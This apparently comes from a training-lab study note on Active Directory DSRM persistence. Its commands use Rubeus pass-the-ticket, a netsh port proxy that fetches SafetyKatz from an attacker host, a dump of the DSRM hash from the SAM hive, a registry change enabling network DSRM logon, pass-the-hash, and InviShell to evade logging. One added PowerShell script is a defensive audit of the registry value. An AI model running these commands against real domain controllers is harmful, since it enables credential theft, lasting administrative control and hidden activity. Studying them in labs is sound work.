DSRM
DSRM (Directory Services Restore Mode)
Every Domain Controller has a local Administrator account whose password is the SafeModePassword set when the server was promoted to a DC. That password is rarely changed, which makes the account attractive for long-term persistence.
Requirements:
- Domain Admin privileges.
- Access to the DC.
Step 1 - Get a DA session
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args "asktgt /user:svcadmin /aes256:[HASH_AES256_SVCADMIN] /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt"
Step 2 - Copy Loader to DC and dump the DSRM hash
# Copy Loader.exe to the DC
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
# Access the DC
winrs -r:dcorp-dc cmd
# Create a port proxy to download SafetyKatz from your machine (avoids touching disk)
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.X
# Dump the SAM hive to get the DSRM hash
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "token::elevate" "lsadump::evasive-sam" "exit"
⚠️ The first Administrator hash returned by lsadump::evasive-sam is the DSRM one. Compare it with the domain Administrator hash from lsadump::lsa /patch to confirm (the two differ).
Step 3 - Modify DC registry to allow network login
By default the DSRM Administrator cannot log on from the network. Change this by setting the DsrmAdminLogonBehavior value under the Lsa key on the DC:
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "DsrmAdminLogonBehavior" /t REG_DWORD /d 2 /f
/d 2 = network logon with the DSRM account is always allowed, not only when the DC is booted into DSRM.
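A defender-side counterpart to this step, added here as an example that is not part of the original notes: a PowerShell audit that reads the same DsrmAdminLogonBehavior value on every DC and flags anything other than the default. It assumes the ActiveDirectory module is installed and that the caller can run Invoke-Command over WinRM against the DCs.

```powershell
# Added example (not from the original notes): audit DsrmAdminLogonBehavior on all DCs.
# Assumes: ActiveDirectory module available, WinRM access to each DC.
$regPath   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$valueName = 'DsrmAdminLogonBehavior'

# Documented meanings; an absent value behaves as 0.
$meaning = @{
    0 = 'DSRM logon only while booted into DSRM (default)'
    1 = 'DSRM logon allowed while the AD DS service is stopped'
    2 = 'DSRM logon always allowed, including over the network'
}

$dcs = (Get-ADDomainController -Filter *).HostName

$results = Invoke-Command -ComputerName $dcs -ScriptBlock {
    param($path, $name)
    # SilentlyContinue: a missing value is normal and means the default (0).
    $item = Get-ItemProperty -Path $path -Name $name -ErrorAction SilentlyContinue
    [pscustomobject]@{
        DC        = $env:COMPUTERNAME
        Value     = if ($null -eq $item) { 0 } else { [int]$item.$name }
        CheckedAt = Get-Date
    }
} -ArgumentList $regPath, $valueName

foreach ($r in $results) {
    $status = if ($r.Value -eq 0) { 'OK' } else { 'ALERT' }
    $desc   = if ($meaning.ContainsKey($r.Value)) { $meaning[$r.Value] } else { 'unexpected value' }
    '{0,-6} {1,-20} {2} = {3} ({4})' -f $status, $r.DC, $valueName, $r.Value, $desc
}

# To see the change as it happens rather than on the next audit, enable object-access
# auditing with a SACL on the Lsa key: a write then logs as event 4657 (registry value modified).
```

Any DC reporting a value of 1 or 2 should be treated as a finding until the change is explained, and the DSRM password on that DC reset.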
Step 4 - Pass-the-Hash and access the DC
DSRM is a local account, so we use NTLM (not Kerberos) and connect via IP instead of hostname.
# PTH with the DSRM NTLM hash - opens a new cmd.exe with injected credentials
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "sekurlsa::evasive-pth /domain:dcorp-dc /user:Administrator /ntlm:[HASH_DSRM_NTLM] /run:cmd.exe" "exit"
# From the new process - add DC IP to TrustedHosts (required for NTLM over IP)
Set-Item WSMan:\localhost\Client\TrustedHosts 172.16.2.1
# Load InviShell to evade logging
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
# Connect to the DC using IP (forces NTLM) and implicit credentials (uses injected hash)
Enter-PSSession -ComputerName 172.16.2.1 -Authentication NegotiateWithImplicitCredential
⚠️ Why IP and not hostname? Kerberos needs a hostname-based SPN, so connecting by IP makes Windows fall back to NTLM. Since the DSRM Administrator is a local account with no Kerberos identity, we force NTLM by connecting via IP.
⚠️ Why NegotiateWithImplicitCredential? It tells PowerShell to use the credentials already injected in memory by the PTH, without prompting for a password.